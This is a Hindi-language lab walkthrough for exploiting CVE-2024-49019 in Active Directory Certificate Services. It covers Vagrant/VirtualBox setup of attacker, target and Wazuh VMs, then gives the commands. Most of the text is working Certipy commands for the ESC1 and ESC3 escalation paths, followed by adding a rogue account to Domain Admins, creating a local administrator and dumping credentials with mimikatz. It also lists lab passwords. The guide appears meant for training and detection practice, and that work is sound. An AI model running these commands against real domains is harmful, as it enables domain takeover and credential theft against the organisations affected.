
CVE-2024-49019 के लिए शोषण
CVE-2024-49019 Active Directory प्रमाणपत्र सेवाओं (AD CS) में एक भेद्यता है जो हमलावर को प्रमाणपत्र-आधारित प्रमाणीकरण का दुरुपयोग करके विशेषाधिकार बढ़ाने की अनुमति देती है। यह मार्गदर्शिका बताती है कि Certipy का उपयोग करके इस भेद्यता का शोषण कैसे किया जाए।
| वर्चुअल मशीन | उपयोगकर्ता नाम | पासवर्ड |
|---|---|---|
| Windows Server 2022 | Administrator | !@windowsadmintest101 |
| Windows Server 2022 | testuser | $Vulnerable139 |
| Kali-VM | vagrant | vagrant |
| Ubuntu-Wazuh | wazuh | admin |
Ubuntu-Wazuh VM का उपयोग पहचान उद्देश्यों के लिए किया जाता है। पहचान मार्गदर्शिका शमन
पहले, आवश्यक फ़ाइलों वाली रिपॉजिटरी क्लोन करें:
git clone https://github.com/rayngnpc/CVE-2024-49019-rayng.git
cd CVE-2024-49019-rayng
आगे बढ़ने से पहले आपको अपनी होस्ट मशीन पर Vagrant स्थापित करना होगा।
Vagrant को यहाँ से डाउनलोड और इंस्टॉल करें, या PowerShell का उपयोग करके इंस्टॉल करें:
choco install vagrant
sudo apt update && sudo apt install vagrant -y
cd windows-server2022
vagrant up
cd kali-VM
vagrant up
cd WazuhUbuntu
vagrant up
चूंकि शोषण के लिए NAT नेटवर्क की आवश्यकता है, VirtualBox को इस प्रकार कॉन्फ़िगर करें:
नीचे कमांड चलाने से पहले, सुनिश्चित करें कि VBoxManage आपके पर्यावरण चर में जोड़ा गया है। यदि नहीं, तो कमांड को उसके पूर्ण पथ का उपयोग करके निष्पादित करें:
VBoxManage natnetwork add --netname NatNet1 --network "10.0.2.0/24" --enable
यदि VBoxManage पहचाना नहीं गया है, तो उपयोग करें:
"C:\Program Files\Oracle\VirtualBox\VBoxManage.exe" natnetwork add --netname NatNet1 --network "10.0.2.0/24" --enable
VBoxManage natnetwork add --netname NatNet1 --network "10.0.2.0/24" --enable
सुनिश्चित करें कि VirtualBox में सभी VM की जांच करें और वे नेटवर्क एडाप्टर NatNetwork - NatNet1 को असाइन किए गए हैं। आप अलग नाम से NAT नेटवर्क बना सकते हैं, लेकिन यह IP रेंज 10.0.2.0/24 में होना चाहिए।
आगे बढ़ने से पहले, सुनिश्चित करें कि सभी VM चालू हैं।
हमला शुरू करने के लिए Kali Linux VM तक पहुंचें और अपनी /etc/hosts फ़ाइल अपडेट करें:
sudo nano /etc/hosts
निम्न प्रविष्टि जोड़ें:
10.0.2.121 SERVER2022.pchau.domain.local SERVER2022 pchau-SERVER2022-CA pchau.domain.local
सहेजें और बाहर निकलें।
CVE-49019 निर्देशिका पर जाएं और Python वर्चुअल वातावरण सक्रिय करें:
cd ~/CVE-49019
source ~/CVE-49019/rayng/bin/activate
इस भेद्यता का शोषण करने के दो तरीके हैं: ESC1 और ESC3।
certipy find -dc-ip 10.0.2.121 -username testuser -password '$Vulnerable139' -vulnerable -stdout
certipy req -ca pchau-SERVER2022-CA -target-ip 10.0.2.121 -u '[email protected]' -p '$Vulnerable139' -template "WebServer" -upn "[email protected]" --application-policies 'Client Authentication'
certipy auth -pfx administrator.pfx -ldap-shell -dc-ip 10.0.2.121
add_user badadmin
add_user_to_group badadmin "Domain Admins"
certipy find -dc-ip 10.0.2.121 -username testuser -password '$Vulnerable139' -vulnerable -stdout
certipy req -u [email protected] -p '$Vulnerable139' --application-policies "1.3.6.1.4.1.311.20.2.1" -ca 'pchau-SERVER2022-CA' -template WebServer -dc-ip 10.0.2.121
certipy req -u [email protected] -p '$Vulnerable139' -on-behalf-of PCHAU\\Administrator -template USER -ca 'pchau-SERVER2022-CA' -pfx testuser.pfx -dc-ip 10.0.2.121
certipy auth -pfx administrator.pfx -dc-ip 10.0.2.121
एक समाधान है, सुनिश्चित करें कि आपकी होस्ट मशीन का समय Windows सर्वर के समान हो। Kali-Linux VM को Windows-Server के समान अद्यतन करने के लिए यह कमांड करना सुनिश्चित करें:
sudo timedatectl set-ntp off
sudo rdate -n 10.0.2.121
w32tm /config /manualpeerlist:"time.windows.com,0x8" /syncfromflags:manual /reliable:yes /update
certipy auth -pfx administrator.pfx -ldap-shell -dc-ip 10.0.2.121
एक बार व्यवस्थापक-स्तरीय पहुंच प्राप्त हो जाने पर, हमलावर यह कर सकता है:
net user hacked /add
net localgroup "Administrators" hacked /add
sekurlsa::logonpasswords
पहचान और शमन रणनीतियों के लिए, पहचान मार्गदर्शिका देखें।
CVE-2024-49019 अनधिकृत विशेषाधिकार वृद्धि की अनुमति देने की अपनी क्षमता के कारण एक महत्वपूर्ण सुरक्षा जोखिम प्रस्तुत करता है। इस भेद्यता को समझना और Wazuh जैसे उचित पहचान तंत्र को तैनात करना, Active Directory वातावरण को सुरक्षित करने के लिए महत्वपूर्ण है।
AD CS को सुरक्षित करने के बारे में अधिक जानकारी के लिए, Microsoft Security CVE-2024-49019 देखें।